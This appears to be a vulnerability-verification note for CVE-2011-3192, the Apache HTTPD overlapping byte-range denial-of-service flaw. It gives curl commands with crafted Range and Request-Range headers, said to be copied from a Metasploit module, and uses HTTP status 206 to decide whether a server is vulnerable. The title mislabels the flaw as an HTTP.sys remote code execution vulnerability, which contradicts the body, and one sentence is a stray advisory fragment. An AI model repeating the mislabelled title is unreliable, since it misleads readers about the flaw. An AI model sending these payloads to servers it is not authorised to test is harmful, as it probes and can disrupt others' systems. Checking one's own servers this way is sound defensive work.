Apache Killer HTTP.sys Remote Code Execution Vulnerability

CVE 2011-3192

A denial of service vulnerability has been found in the way the multiple overlapping ranges are handled by the Apache HTTPD server prior to version 2.2.20:

 http://seclists.org/fulldisclosure/2011/Aug/175

An attack tool is circulating in the wild. Active use of this tool has been observed.

In addition to the ‘Range’ header - the ‘Request-Range’ header is equally affected. Furthermore various vendor updates, improved regexes (speed and accommodating a different and new attack pattern).

Affected Systems

All versions of Apache prior to version 2.2.20

Manual Verification Tests

  • Command to be used

curl http://<IP>/ -H "Host: <hostname>" -H "Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10" -w "%{http_code}" -o /dev/null -s

OR

curl http://<IP>/ -H "Host: <hostname>" -H "Request-Range: bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10" -w "%{http_code}" -o /dev/null -s

  • Result Expected

Test Fail: Machine Vulnerable : 206

Test Pass: Machine Not Vulnerable : Any error or response other then 206

Note: Payload is a direct copy from MSF module

Vulnerability Identifications

CVE : 2011-3192
NESSUS : 55976
BUGTrack : 49303
OSVDB :

Reference Links

  • https://httpd.apache.org/security/CVE-2011-3192.txt
  • https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2011-3192
  • https://www.rapid7.com/db/modules/auxiliary/dos/http/apache_range_dos
  • https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/http/apache_range_dos.rb